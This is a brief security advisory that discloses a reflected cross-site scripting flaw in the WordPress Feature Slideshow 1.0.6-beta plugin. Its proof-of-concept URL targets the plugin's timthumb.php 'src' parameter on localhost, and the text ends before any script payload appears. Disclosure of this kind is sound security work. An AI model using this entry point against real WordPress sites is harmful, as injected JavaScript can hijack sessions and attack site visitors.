------------------------------------------------------------------------ Software................WordPress Feature Slideshow 1.0.6-beta Vulnerability...........Reflected Cross-site Scripting Download................http://sleek.no/kunder/138 Release Date............1/24/2011 Tested On...............Windows 7 + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in WordPress Feature Slideshow 1.0.6-beta can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=